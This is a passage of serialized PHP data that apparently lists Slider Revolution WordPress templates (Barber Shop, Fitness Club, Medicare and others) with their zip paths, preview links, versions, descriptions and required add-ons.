class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:153:\"[{\"path\":\"revslider-snow-addon\\/revslider-snow-addon.php\",\"name\":\"Snow AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:251;a:25:{s:2:\"id\";s:3:\"260\";s:5:\"title\";s:11:\"Barber Shop\";s:5:\"alias\";s:11:\"barber-shop\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:19:\"barber-shop-package\";s:3:\"img\";s:32:\"packages/barber-shop-package.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:252;a:25:{s:2:\"id\";s:3:\"261\";s:5:\"title\";s:18:\"Barber Shop Header\";s:5:\"alias\";s:18:\"barber-shop-header\";s:3:\"zip\";s:28:\"packs/barber-shop-header.zip\";s:3:\"uid\";s:32:\"71c995d36d39a0e8a04cffdf753f2ba2\";s:3:\"img\";s:29:\"barber-shop-header/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:253;a:25:{s:2:\"id\";s:3:\"262\";s:5:\"title\";s:23:\"Barber Shop Mobile Menu\";s:5:\"alias\";s:23:\"barber-shop-mobile-menu\";s:3:\"zip\";s:33:\"packs/barber-shop-mobile-menu.zip\";s:3:\"uid\";s:32:\"762c6fb5c6306f37becb1e55773c2592\";s:3:\"img\";s:34:\"barber-shop-mobile-menu/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:254;a:25:{s:2:\"id\";s:3:\"263\";s:5:\"title\";s:24:\"Barber Shop First Screen\";s:5:\"alias\";s:24:\"barber-shop-first-screen\";s:3:\"zip\";s:34:\"packs/barber-shop-first-screen.zip\";s:3:\"uid\";s:32:\"acf70bfd64cff2c3c2ea5585223575da\";s:3:\"img\";s:35:\"barber-shop-first-screen/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:255;a:25:{s:2:\"id\";s:3:\"264\";s:5:\"title\";s:17:\"Barber Shop About\";s:5:\"alias\";s:17:\"barber-shop-about\";s:3:\"zip\";s:27:\"packs/barber-shop-about.zip\";s:3:\"uid\";s:32:\"bc8b63cfc7f8c34173b4fd5b082fc05a\";s:3:\"img\";s:28:\"barber-shop-about/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:256;a:25:{s:2:\"id\";s:3:\"265\";s:5:\"title\";s:20:\"Barber Shop Services\";s:5:\"alias\";s:20:\"barber-shop-services\";s:3:\"zip\";s:30:\"packs/barber-shop-services.zip\";s:3:\"uid\";s:32:\"d65121d6f84fabd812a2b621b768e10e\";s:3:\"img\";s:31:\"barber-shop-services/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:257;a:25:{s:2:\"id\";s:3:\"266\";s:5:\"title\";s:19:\"Barber Shop Barbers\";s:5:\"alias\";s:19:\"barber-shop-barbers\";s:3:\"zip\";s:29:\"packs/barber-shop-barbers.zip\";s:3:\"uid\";s:32:\"003e9fec9693072119c8f8d8b6690c4d\";s:3:\"img\";s:30:\"barber-shop-barbers/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:258;a:25:{s:2:\"id\";s:3:\"267\";s:5:\"title\";s:20:\"Barber Shop Contacts\";s:5:\"alias\";s:20:\"barber-shop-contacts\";s:3:\"zip\";s:30:\"packs/barber-shop-contacts.zip\";s:3:\"uid\";s:32:\"cdcc08f5d6c90dbcfd0502bda2401643\";s:3:\"img\";s:31:\"barber-shop-contacts/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:259;a:25:{s:2:\"id\";s:3:\"268\";s:5:\"title\";s:18:\"Barber Shop Footer\";s:5:\"alias\";s:18:\"barber-shop-footer\";s:3:\"zip\";s:28:\"packs/barber-shop-footer.zip\";s:3:\"uid\";s:32:\"26ca5ae0de7cdbb2ca19348b6e01eda0\";s:3:\"img\";s:29:\"barber-shop-footer/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/barber-shop-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:220:\"<span class=\"ttm_content\">The Barber Shop is a useful One-Page template presenting all information about your business. Build your websites faster with Slider Revolution templates.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Barber Shop\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"16\";s:9:\"installed\";b:0;}i:260;a:22:{s:2:\"id\";s:3:\"269\";s:5:\"title\";s:12:\"Fitness Club\";s:5:\"alias\";s:21:\"fitness-club-template\";s:3:\"zip\";s:25:\"fitness-club-template.zip\";s:3:\"uid\";s:32:\"14ea10d68d6aad1df62b3becf71df754\";s:3:\"img\";s:32:\"fitness-club-template/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/fitness-club-header-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:223:\"<span class=\"ttm_content\">The Fitness Club Header is the perfect introduction to your fitness themed website. Showcase your current offers or service portfolio with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:261;a:22:{s:2:\"id\";s:3:\"270\";s:5:\"title\";s:13:\"Soccer School\";s:5:\"alias\";s:13:\"soccer-school\";s:3:\"zip\";s:17:\"soccer-school.zip\";s:3:\"uid\";s:32:\"9906b48812aff67097f990eeee42dd41\";s:3:\"img\";s:24:\"soccer-school/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/soccer-club-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:228:\"<span class=\"ttm_content\">The Soccer Club Header is the perfect introduction to your Soccer School themed website. Showcase your current offers or service portfolio with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:262;a:22:{s:2:\"id\";s:3:\"271\";s:5:\"title\";s:10:\"Music Band\";s:5:\"alias\";s:19:\"music-band-template\";s:3:\"zip\";s:23:\"music-band-template.zip\";s:3:\"uid\";s:32:\"91e79657bf1b1812f8114a00ab8e0eb4\";s:3:\"img\";s:30:\"music-band-template/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/music-band-template-for-wordpress/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:7:\"5.4.8.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Music Band Header is the perfect introduction to your Music Band themed website. Showcase your current songs, albums and videos with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:263;a:22:{s:2:\"id\";s:3:\"272\";s:5:\"title\";s:15:\"Restaurant Menu\";s:5:\"alias\";s:15:\"restaurant-menu\";s:3:\"zip\";s:19:\"restaurant-menu.zip\";s:3:\"uid\";s:32:\"078809cffb21b6c4d3f5aaa2daeb193d\";s:3:\"img\";s:26:\"restaurant-menu/slide1.jpg\";s:7:\"preview\";s:71:\"https://revolution.themepunch.com/restaurant-menu-slider-for-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.4.8.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:208:\"<span class=\"ttm_content\">The Restaurant Menu Header is the perfect introduction to your Restaurant themed website. Showcase your current dishes with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:264;a:22:{s:2:\"id\";s:3:\"273\";s:5:\"title\";s:16:\"Cinematic Slider\";s:5:\"alias\";s:16:\"cinematic-slider\";s:3:\"zip\";s:20:\"cinematic-slider.zip\";s:3:\"uid\";s:32:\"c53e7dcbb6b656ae7b4c91d333589838\";s:3:\"img\";s:27:\"cinematic-slider/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/cinematic-slider-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:138:\"<span class=\"ttm_content\">Bold texts and a cinematic transition effect make this slider stand out!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:265;a:22:{s:2:\"id\";s:3:\"274\";s:5:\"title\";s:17:\"3D Parallax Cubes\";s:5:\"alias\";s:17:\"3d-parallax-cubes\";s:3:\"zip\";s:21:\"3d-parallax-cubes.zip\";s:3:\"uid\";s:32:\"c5b809a1829f8f809c9a768cd3d6b3cb\";s:3:\"img\";s:28:\"3d-parallax-cubes/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/3d-parallax-cubes-slider-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">This amazing 3D cubes parallax effect can be an eye-opening intro for your website!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:266;a:25:{s:2:\"id\";s:3:\"275\";s:5:\"title\";s:33:\"Medicare Medical Services Website\";s:5:\"alias\";s:33:\"medicare-medical-services-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:41:\"medicare-medical-services-website-package\";s:3:\"img\";s:29:\"packages/medicare_package.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:267;a:25:{s:2:\"id\";s:3:\"276\";s:5:\"title\";s:13:\"Medicare Menu\";s:5:\"alias\";s:13:\"medicare-menu\";s:3:\"zip\";s:23:\"packs/medicare-menu.zip\";s:3:\"uid\";s:32:\"0e4ca8fc281e20251b3fffa19d470fed\";s:3:\"img\";s:24:\"medicare-menu/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:268;a:25:{s:2:\"id\";s:3:\"277\";s:5:\"title\";s:15:\"Medicare Header\";s:5:\"alias\";s:15:\"medicare-header\";s:3:\"zip\";s:25:\"packs/medicare-header.zip\";s:3:\"uid\";s:32:\"03e8ade247d8c96f548bc0515f34043f\";s:3:\"img\";s:26:\"medicare-header/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/medicare-medical-services-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:163:\"<span class=\"ttm_content\">The Medicare Medical Services template is a great solution for your medical practice or hospital.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Medicare Medical Services\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"17\";s:9:\"installed\";b:0;}i:269;a:25:{s:2:\"id\";s:3:\"278\";s:5:\"title\";s:14:\"Medicare 